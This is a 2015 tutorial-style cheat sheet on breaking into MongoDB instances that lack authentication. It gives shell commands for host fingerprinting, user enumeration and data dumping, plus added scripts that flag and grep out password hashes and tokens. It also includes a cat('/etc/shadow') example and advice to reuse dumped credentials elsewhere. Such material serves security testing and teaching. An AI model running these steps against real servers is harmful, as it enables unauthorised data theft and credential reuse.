Thursday, July 2, 2015

Intro to Hacking Mongo DB

By Tony Lee


There is a plethora of literature on hacking SQL databases, i.e. going from database access to OS-level command execution or a shell.  There seems to be a shortage of information on hacking NoSQL databases such as MongoDB, however.  This article will hopefully help others get a jump start when they run into a MongoDB instance with weak or no credentials (yes, it has happened: authentication is off by default, and servers of this era listen on every interface unless bind_ip is set).  It does not list all possibilities and is only meant to be a cheat sheet.  Feel free to list your favorite commands as well as tips and tricks in the comment section below.

Install the mongo client on Kali (the same package provides mongodump, bsondump and the other mongo* tools used below):

apt-get install mongodb-clients

Connect to DB:

mongo --host <IP> --port <port> -u <username> -p <password> [--authenticationDatabase <db>]
Note:  Port 27017 is the default.  Without --host the shell connects to localhost, and without -u/-p it connects unauthenticated, which is exactly what works against a server with auth disabled.  When credentials are required, remember that MongoDB users belong to a database: pass --authenticationDatabase admin (or whichever database the user was created in), otherwise the shell authenticates against the database it connects to (test by default) and fails.

ex:  mongo -u foo -p bar
ex:  mongo --host <IP> --authenticationDatabase admin -u foo -p bar

Show server info:

db.adminCommand( { "hostInfo" : 1 } )

Note:  hostname, OS release, kernel and libc version come straight from the server, which is handy for fingerprinting the box before you go looking for anything else on it.

ex: db.adminCommand( { "hostInfo" : 1 } )
{
    "system" : {
        "currentTime" : ISODate("2014-03-01T14:47:54.379Z"),
        "hostname" : "AwesomePC",
        "cpuAddrSize" : 64,
        "memSizeMB" : 1002,
        "numCores" : 2,
        "cpuArch" : "x86_64",
        "numaEnabled" : false
    },
    "os" : {
        "type" : "Linux",
        "name" : "PRETTY_NAME=\"Debian GNU/Linux 7 (wheezy)\"",
        "version" : "Kernel 3.2.0-4-amd64"
    },
    "extra" : {
        "versionString" : "Linux version 3.2.0-4-amd64 ( (gcc version 4.6.3 (Debian 4.6.3-14) ) #1 SMP Debian 3.2.63-2+deb7u1",
        "libcVersion" : "2.13",
        "kernelVersion" : "3.2.0-4-amd64",
        "cpuFrequencyMHz" : "2266.747"
    },
    "ok" : 1
}

Show users:

show users
db.runCommand( { usersInfo: 1 } )

Note:  both list only the users defined for the current database.  Since MongoDB 2.6 all user documents live in the admin database (admin.system.users) no matter which database they were created for, so switch to it (use admin) and run show users there to see everyone; older servers keep a separate system.users collection in each database, so check each one.

ex:  show users

Show roles:

show roles

Note:  lists the built-in roles plus any user-defined roles in the current database.  Custom roles are worth reading in full, since they can grant far more than their names suggest.

ex:  show roles

Show databases:

show dbs

ex:  show dbs
SecretDB  (size of DB)
AwesomeDB (size of DB)
EmptyDB   (empty)

Use database:

use <db_name>

ex:  use SecretDB

Show tables (MongoDB calls them collections; show tables is just an alias):

show tables
show collections

ex: show tables

List data in the table/collection:

db.<collection_name>.find()

ex:  db.users.find()

Note:  by default the shell prints the first 20 documents and stops with 'Type "it" for more'; type it to page through the rest.  Append .pretty() for readable output and .count() to learn how many documents there are before paging.

Can also set a limit with:

ex:  db.users.find().limit(5)

Search for exact match in the table/collection:

db.<collection_name>.find( { <field_name> : "<value>" } )

ex:  db.users.find( { name : "Tony" } )

Regular-expression (wildcard-style) search in the table/collection:

db.<collection_name>.find( { <field_name> : /<value>/i } )

Note:  the value is a regular expression.  It is unanchored, so /tony/ matches "Tony", "Anthony" and "tony123"; anchor with ^ and $ for an exact but case-insensitive match.  The i after the closing / makes the match case insensitive.  A case-insensitive regex cannot use an index, so the query scans the whole collection: fine for enumeration, slow on big collections.

ex:  db.users.find( { name : /tony/i } )
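
Putting the connect, show dbs, use, show collections and find steps above into one pass: the script below is an added example (not from the original post and not MongoDB project code) that walks every database and collection through the mongo shell's JavaScript API, records the field names seen in a sample of documents, and flags names that look like credentials so a big server can be triaged before anything is dumped.  The SENSITIVE pattern, the sample size, the name enum.js and the in-memory sample server data are assumptions for the demo; under a real shell the global db is used instead.

```javascript
// Added example, not part of the original post or the MongoDB project.
// Walks every database/collection reachable through the shell's `db`
// object and summarises field names, flagging credential-looking ones.
//
// Real use:  mongo --host <IP> --quiet enum.js   (the shell provides `db`)
// Offline:   node enum.js                        (uses the stub below)

// Field names worth a closer look. An assumption for the demo; extend it.
var SENSITIVE = /pass|pwd|secret|token|key|hash|salt|ssn|card/i;

// Enumerate the server behind `conn` (the shell's `db` object).
// Returns one record per collection: document count, field names seen in
// the first `sampleSize` documents, and which of those look sensitive.
function enumerateServer(conn, sampleSize) {
  var findings = [];
  conn.getMongo().getDBNames().forEach(function (dbName) {
    var database = conn.getSiblingDB(dbName);
    database.getCollectionNames().forEach(function (collName) {
      var coll = database.getCollection(collName);
      var seen = {};
      coll.find({}).limit(sampleSize).toArray().forEach(function (doc) {
        Object.keys(doc).forEach(function (field) { seen[field] = true; });
      });
      var fields = Object.keys(seen).sort();
      findings.push({
        db: dbName,
        collection: collName,
        count: coll.count(),
        fields: fields,
        suspicious: fields.filter(function (f) { return SENSITIVE.test(f); })
      });
    });
  });
  return findings;
}

// Constructed stand-in for the shell's `db`, mimicking only the API calls
// used above so the logic runs under Node.js with no server. Demo data only.
function fakeShellDb(server) {
  function collection(docs) {
    return {
      find: function () {
        var n = docs.length;
        return {
          limit: function (k) { n = Math.min(k, docs.length); return this; },
          toArray: function () { return docs.slice(0, n); }
        };
      },
      count: function () { return docs.length; }
    };
  }
  return {
    getMongo: function () {
      return { getDBNames: function () { return Object.keys(server); } };
    },
    getSiblingDB: function (name) {
      var colls = server[name];
      return {
        getCollectionNames: function () { return Object.keys(colls); },
        getCollection: function (c) { return collection(colls[c]); }
      };
    }
  };
}

// Made-up data for the offline run.
var SAMPLE_SERVER = {
  SecretDB: {
    users: [
      { _id: 1, name: "Tony", passwordHash: "$2a$10$fakehash", apiToken: "tok-fake-1" },
      { _id: 2, name: "Bob", passwordHash: "$2a$10$fakehash", role: "admin" }
    ],
    logs: [ { _id: 1, msg: "login ok" } ]
  },
  EmptyDB: {}
};

var target = (typeof db !== "undefined") ? db : fakeShellDb(SAMPLE_SERVER);
var results = enumerateServer(target, 50);

// print() exists in the mongo shell, console.log under Node.js.
var out = (typeof print === "function") ? print : console.log;
results.forEach(function (r) {
  out(r.db + "." + r.collection + " (" + r.count + " docs) fields: " + r.fields.join(", ") +
      (r.suspicious.length ? "  <-- check: " + r.suspicious.join(", ") : ""));
});
```

Against the sample data this prints one line per collection and marks users for its apiToken and passwordHash fields.  Field names come only from the sampled documents, so a collection whose early records lack a field will not show it; raise the sample size or fall back to a full find() on anything that looks interesting.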

Dump the DB for off-line grepping:

mongodump -u <user> -p <pass> -h <IP> --db <db_name> [--authenticationDatabase admin] [--out <dir>]

ex:  mongodump -u foo -p bar --db SecretDB

Note:  Results are dumped to dump/<db_name>/<collection_name>.bson, with the indexes in a <collection_name>.metadata.json beside each one.  Leave off --db to dump every database the account can read.  The .bson files are binary BSON, so grep will not get far on them directly: convert with bsondump dump/<db_name>/<collection_name>.bson > <collection_name>.json first, or pull a single collection straight to JSON with mongoexport.
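
Because the dump files are raw BSON, here is an added example (not from the original post and not a substitute for bsondump) of a minimal reader for the types that make up typical application data, with a grep-style filter over the decoded documents.  It shows the layout of a .bson dump: documents written back to back, each a little-endian length, a list of type/name/value elements and a terminating NUL.  The sample dump bytes are built inline by hand-rolled encoder helpers for the demo; the field names and values in them are made up.

```javascript
// Added example, not part of the original post or the MongoDB tools.
// Minimal reader for mongodump's .bson files: BSON documents with no
// framing between them. Handles the types typical application data uses
// and throws on anything else; bsondump is the real tool for the job.

// Decode one document starting at `offset`; returns its value and the
// offset just past it, so a file of concatenated documents can be walked.
function decodeDocument(buf, offset) {
  const size = buf.readInt32LE(offset);   // counts itself and the trailing 0x00
  const end = offset + size;
  if (size < 5 || end > buf.length || buf[end - 1] !== 0x00) {
    throw new Error("corrupt or truncated document at offset " + offset);
  }
  const doc = {};
  let pos = offset + 4;
  while (pos < end - 1) {
    const type = buf[pos++];
    const nameEnd = buf.indexOf(0x00, pos);  // element name is a NUL-terminated cstring
    const name = buf.toString("utf8", pos, nameEnd);
    pos = nameEnd + 1;
    let value;
    switch (type) {
      case 0x01: value = buf.readDoubleLE(pos); pos += 8; break;
      case 0x02: {                              // string: int32 length (incl. NUL), bytes, NUL
        const len = buf.readInt32LE(pos);
        value = buf.toString("utf8", pos + 4, pos + 4 + len - 1);
        pos += 4 + len; break;
      }
      case 0x03: {                              // embedded document
        const r = decodeDocument(buf, pos); value = r.value; pos = r.end; break;
      }
      case 0x04: {                              // array: a document keyed "0", "1", ...
        const r = decodeDocument(buf, pos);
        value = Object.keys(r.value).map((k) => r.value[k]); pos = r.end; break;
      }
      case 0x05: {                              // binary: int32 length, subtype byte, bytes
        const len = buf.readInt32LE(pos);
        value = { $binary: buf.toString("hex", pos + 5, pos + 5 + len), $subtype: buf[pos + 4] };
        pos += 5 + len; break;
      }
      case 0x07: value = { $oid: buf.toString("hex", pos, pos + 12) }; pos += 12; break;
      case 0x08: value = buf[pos] !== 0; pos += 1; break;
      case 0x09: value = new Date(Number(buf.readBigInt64LE(pos))); pos += 8; break;  // UTC ms
      case 0x0a: value = null; break;
      case 0x10: value = buf.readInt32LE(pos); pos += 4; break;
      case 0x12: value = Number(buf.readBigInt64LE(pos)); pos += 8; break;
      default:
        throw new Error("unsupported BSON type 0x" + type.toString(16) + " in field " + name);
    }
    doc[name] = value;
  }
  return { value: doc, end: end };
}

// A dump file is just documents back to back: decode them all.
function decodeDump(buf) {
  const docs = [];
  for (let pos = 0; pos < buf.length; ) {
    const r = decodeDocument(buf, pos);
    docs.push(r.value);
    pos = r.end;
  }
  return docs;
}

// grep equivalent: the documents whose JSON rendering matches `re`.
function grepDump(buf, re) {
  return decodeDump(buf).filter((d) => re.test(JSON.stringify(d)));
}

// --- Constructed sample input (hand-rolled encoder helpers, demo only) ---
function cstr(s) { return Buffer.from(s + "\0", "utf8"); }
function int32(n) { const b = Buffer.alloc(4); b.writeInt32LE(n, 0); return b; }
function int64(n) { const b = Buffer.alloc(8); b.writeBigInt64LE(BigInt(n), 0); return b; }
function strElem(name, s) {
  const v = cstr(s);
  return Buffer.concat([Buffer.from([0x02]), cstr(name), int32(v.length), v]);
}
function docBytes(elems) {                     // length prefix counts itself and the trailing NUL
  const body = Buffer.concat(elems);
  return Buffer.concat([int32(body.length + 5), body, Buffer.from([0x00])]);
}
// Two made-up records, the way a dump of a "users" collection would hold them.
const SAMPLE_DUMP = Buffer.concat([
  docBytes([
    strElem("name", "Tony"),
    Buffer.concat([Buffer.from([0x08]), cstr("admin"), Buffer.from([0x01])]),
  ]),
  docBytes([
    strElem("name", "Bob"),
    strElem("pwHash", "$2a$10$fakehashvalue"),
    Buffer.concat([Buffer.from([0x10]), cstr("uid"), int32(1001)]),
    Buffer.concat([Buffer.from([0x09]), cstr("created"), int64(1393685274379)]),
    Buffer.concat([Buffer.from([0x04]), cstr("roles"), docBytes([strElem("0", "read")])]),
  ]),
]);

// Print the records that mention a password hash, one JSON line each.
grepDump(SAMPLE_DUMP, /pwHash/).forEach((d) => console.log(JSON.stringify(d)));
```

To run it over a real dump, replace SAMPLE_DUMP with fs.readFileSync("dump/<db_name>/<collection_name>.bson").  The reader deliberately refuses documents whose declared length runs past the buffer, which is what a dump cut short by a dropped connection looks like, rather than guessing at the remainder.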




Note on shell helpers:  cat(), ls(), pwd(), hostname() and friends run inside the mongo shell on YOUR machine, not on the server.
ex:  cat("/etc/shadow") is your own shadow file :(  Bummer, I know!
Server-side JavaScript ($where, mapReduce and, on pre-3.0 servers, db.eval()) executes inside mongod with no file or process access, so the database contents are the prize here, not a path to the host; the next hop is whatever the dumped credentials open elsewhere.